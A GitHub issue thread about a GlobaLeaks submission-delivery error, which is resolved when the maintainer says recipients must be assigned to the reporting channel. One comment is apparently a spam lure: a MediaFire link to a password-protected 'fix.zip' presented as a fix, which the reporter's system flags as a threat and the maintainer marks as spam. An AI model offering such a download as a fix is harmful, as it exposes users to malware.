### ISSUE TITLE
Unable to deliver the submission to at least one recipient

### ISSUE THREAD

**Issue by dawnog** [globaleaks/GlobaLeaks#4167]
### What version of GlobaLeaks are you using?

4.15.8

### What browser(s) are you seeing the problem on?

Chrome

### What operating system(s) are you seeing the problem on?

Linux

### Describe the issue

I've globalleaks running on vps - debian 11.

I've created users (administrators and recipients etc.) and verified emails by sending test emails.
When I try to submit ( Chrome or other browser on Windows) I got the erorr :Unable to deliver the submission to at least one recipient. Email adresses are correct. Please help

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dawnog** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."
are you sure? this is windows installer and the system detects it as a threat

**Comment by evilaliv3** [comment]
Hello @dawnog , plase ignore the previous message it is unfortunately an automated spam message. I'm proceeding reporting the user.

In relation to your issue, you have prbably forgot to associate your recipient users to the reporting channel.

**Comment by dawnog** [comment]
> Hello @dawnog , plase ignore the previous message it is unfortunately an automated spam message. I'm proceeding reporting the user.
> 
> In relation to your issue, you have prbably forgot to associate your recipient users to the reporting channel.

actually helped, although other users were assigned to channels but apart from the recipient :)
